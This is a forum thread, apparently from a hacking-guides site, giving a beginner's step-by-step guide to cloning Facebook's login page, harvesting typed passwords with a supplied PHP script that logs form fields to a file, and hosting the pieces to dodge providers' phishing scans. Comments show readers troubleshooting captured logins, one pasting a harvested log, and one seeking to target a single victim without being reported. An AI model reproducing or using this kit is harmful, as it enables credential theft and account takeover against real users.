Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners

Hello there,

Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy!

Step 1: Download the HTML Index of the Target Webpage

To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible.

Navigate to Your Webpage

In this tutorial, I am going to phish Facebook.

View the Source of the Webpage.

Depending on your browser, there may be different methods. Normally it is done by right clicking the site and clicking "View Source". I have done that on my browser and a windows should come out similar to this:

On the box to the right is the source of the website. Which leads on to the next step:

Downloading and Saving the Source Code

Select the box, and copy-paste everything in the box to a txt document. Use Notepad on windows, and a simple text editing program if you are not using windows. (Don't use programs like Word or Pages because it is really slow). After you have done that, click "Save As" or whatever option that allows you to save that document. On Notepad it should look like this:

Change "Save as type" to All Files and change the encoding to Unicode.
After that, name the document "index.html", obviously without the speech marks.

Congratulations! You have finished the first step of the tutorial!

Step 2: Creating a PHP File for Password Harvesting

The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don't, just copy my exemplar PHP.

<?php
header ('Location: facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>

Same as above, save the PHP file as "All Files" and as "post.php". Change the encoding to Unicode and you should be ready to go!

Step 3: Modify the Page HTML File to Incorporate Your PHP File in It.

Now, we need to incorporate our PHP file, to receive passwords that the users send.

Find the Password-Sending Method

First, you need to see how the website deals when the user submits a username-password.
For Facebook, all you need to do is to Ctrl-F and type "=action" in the field.

Now, you need to replace everything in the underlined portion with "post.php", keep the speech marks. (just one set please).

Obviously, this method will be different for other websites. A good method to find it is by using Inspect Elements tool in most modern browsers and clicking on the login button. Find something similar to the above method.

Please note: You will need to change this later when you actually host the website.

Step 4: Hosting the PHP File for Password Storing

Now here is the juicy part, making your fake website online so other people can browse it.

You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called "FTP". For this tutorial, I will be using 000webhost.

Navigate to the FTP Server for Your Web Hosting Service

For this step, I assume that you have already created a website with your hosting service.

For 000webhost, you simply click on "File manager" and click "Upload Files". Here is a picture of the FTP server for 000webhost:

Ignore the other files, those are just some of my personal stuff, unrelated to this tutorial.

Upload Your PHP Files and Change Permission

As you can see, I have already uploaded my PHP file. But you need to just upload it to the main folder of your FTP server. (Some FTP server doesn't allow you to upload to the root folder, just follow their particular instructions).

Now you need to change the permission to "777", which is basically every single permission. When prompted to tick boxes for the permissions, just tick every single one.

Now you can close the FTP server. Note down your web address!

Step 5: Hosting the Actual Phishing Page

For this step, you will need to use the exact hosting provider that I use, otherwise you will get banned.

There is a reason why I don't use the same hosting provider for my actual page, and that is because most hosting providers will employ some kind of scanning to detect phishing pages. I can tried multiple hosting services in the past and all of them banned me within 30 mins of uploading the index file.

Configuring the post.php Forum

Now, before you host the website, remember the post.php/login form thing we configured above?

You need to find the login form thing again in your index.html and replace the "post.php" with "http://yourwebsiteforyourpostphpupload/post.php", assuming that you uploaded to the root folder. Remember to add http:// in front of the site. In order to test this, navigate to the website (http://yourwebsiteforyourpostphpupload/post.php) and see if it redirects you to Facebook.com, if it does then you have pasted the correct site. If it doesn't, then double check if you have uploaded your file to the correct directory.

Hosting the Actual Page

Navigate to htmlpasta.com. You will see something similar to this:

Then, you need to copy the index.html file for your phishing site and paste it in here.

Now, click on the reCAPTCHA and click paste, you will get a link for your website.

Step 6: Congratulations!

Congrats! You have finished hosting your first phishing site! Navigate to your site and try to enter some fake login details, after you click the login button, it should redirect you to facebook.com. Login to your FTP server that you hosted your post.php file, and there should be a new document called Log.txt that is stored within the same folder as your post.php file. Any login details should be stored there.

Remember, please do not use this for malicious purpose, only use for penetration testing and with authorisation from your victims.

If you have any question then please comment down below.

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

40 Responses

How do you create it as a mobile page i did the same steps for the mobile html source code but when i click on the login button it doesnt do anything

_which hosting service should i use its my first time

For my website I use XAMPP. It's free and you get as much storage for your website as your pc has.

Having a problem with my post.php file not interpreting

Hi, were you able to solve this problem? I am also stuck with the same error.

me too i too need help plzz help

Change it from unicode to ANSI coding. I had same problem ,after changing my post.php coding to ANSI ,it was solved

Followed the instructions but after i type the password to check if it works it looks for the post php page within the html pasta domain. tried using other hosting sites and it did the same thing. my post php does work but im not able to link to it

I need your phishing page

Please Sir,
Tell me...

Do Have the Ability to Create the Page in *XML* for *blogger.com* ???

Because blogger.com is an ideal site.
And i have tested. It is fully working.

Can you tell me *htmlpasta.com* alternatives ???

Followed the commands however after i type the password to check if it really works it seems for the publish php page within the html pasta area. Attempted using other web hosting sites and it did the identical component. My submit php does paintings however im no longer able to hyperlink to it

Hello Admin, thanks for the share, i tried it and worked like magic. however just as u mentioned, it doesnt work for every site. Please can u share how to phish hotmail login page? i have managed to clone the login page but after inputing the email id, it wont proceed to the password input screen.

Please help.

Hey help me I can't get step 5

i have doubt with uploading php file.should i upload index.html file too with php file?

When I view my log.txt file, there appears to be no login details showing up. I have completed everything the way that you have instructed us to, however I am unable to receive login details as the login.txt file is empty.

Hello. can you please help, how did your log.txt folder showed up. Cause i have done everything, every step and the website is also ready. But whenever i test the website no log.txt folder appears on 000webhost.com

guys can someone please help me?
i cant understand what i must do on stage 5
what should i change post.php to on my index.html?

i cant see a log.txt folder please help.

Can somebody pls help me with this line
http://yourwebsiteforyourpostphpupload/post.php
Am I suppose to write the name of my website....pls somebody should do example for me pls

i have the same error my link never go on facebook, it write :

"$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n\n\n\n"); fclose($handle); exit; ?>"

my link is : https://(myooowebhostwebsite)/post.php
I have try with "post.php" in the racine (error404) and in the public folder (previous error)

How to know if it's the password?

hello admin i have a problem in hosting that site blocked me can u please help me

How to get the password. It is only showing email.

Yes me too any help on that please?

i need help on this too please

I need some help.
It works great, redirects me to facebook, but when I try to log in
In my "log.txt" file does not show anything. How to fix it?
Please help.

Bro I'm having trouble at the "http://yourwebsiteforyourpostphpupload/post.php"

What do I need to add there? The 000WebRoot Host name ?

and do I need to add ".com" or just the "/postphp" part

Please help me.

When I tried to send the link to a messenger, the URL preview is like this. Is there any way to remove it or change it so the site will be more legitimate looking?

they r banning me with in 2 min.....plzz help

Mine isn't redirecting me to any page. I'm not sure if I'm correctly replacing post.php with the right URL "http://yourwebsiteforyourpostphpupload/post.php" (I'm inserting the Host username I created on 000WebRoot)

I'm stuck on this part can someone help please

I'll also add that I didn't save my post.php file as "save all files" because Mac won't let me on "Textedit" software. That might be the issue i'm not sure its my first time creating these pages. Any info will help thanks.

How do i get the password from the log.txt, this is what shows up in mine

jazoest=2700
lsd=AVqwMSi4
email=f....y@my.com
timezone=420
lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzI4LCJjIjoyNH0=
lgnrnd=052059_AEn3
lgnjs=1588594679
abtestdata=AAAAAAAffAAAffAAAAAAAAfAA/AAAAAAAAAAAAAAq//AAAAAAAEAAB
locale=en_GB
next=web.facebook.com
loginsource=loginbluebar
guid=f5364a33e87078
prefillcontactpoint=f.....y@my.com
prefillsource=browseronload
prefilltype=contactpoint

ep=#PWD_BROWSER:5:1588594691:Ac5QAMjnTVDHohTruvF63nw7+HnUVNcwv8bFqYV2RR5wi5kDOorHYhMxH2ymKDNxVpil0vcydnUfloIpPkQGOKPjSRAgoZlgwsec/sV0zoYAEc8RuFObRvUBfmi22nt565TtHLy1SDs8XmB4

superb tricck thank you buddy

How do I save as "all files" . on a mac ???

Nice Trick!

  • A friend of mine was got banned from the Facebook by using the trick similar to this :), but anyways, U Nicely Explained!

Mine isn't redirecting me to any page. I'm not sure if I'm correctly replacing post.php with the right URL "http://yourwebsiteforyourpostphpupload/post.php" (I'm inserting the Host username I created on 000WebRoot)

I'm stuck on this part can someone help please

I'll also add that I didn't save my post.php file as "save all files" because Mac won't let me on "Textedit" software. That might be the issue i'm not sure its my first time creating these pages. Any info will help thanks.

i am having problem in step 5 please help what to put in login form give me the example

I have a question. I purchased some hosting to host the fake facebook page. the problem is that after a few hours that it is online in practice it is reported as if by magic the page alone. and makes the page inaccessible to all browsers. since this page I don't need to sniff accounts to the general public but to a single person. I think the bots that come into contact with my domain are reporting the page. so I think blocking them can solve the problem? is there anyone who understands it who could tell me if this could help? in the end I believe that if the page is alone and without visits of any kind and only the victim can access it, nobody reports anything, doesn't it?

htmlpasta not showing as you tell, any alternatives?

Instead of adding more space, You can easily increase media file upload size in WordPress, By default, the maximum upload size in WordPress ranges from 2MB to 150MB depending on the settings of your web hosting provider is giving by default.

i finished all things but when i try to login it doesnt direct me to facebook.com
and also when i check logins it doesnt right it

Share Your Thoughts

  • Hot
  • Active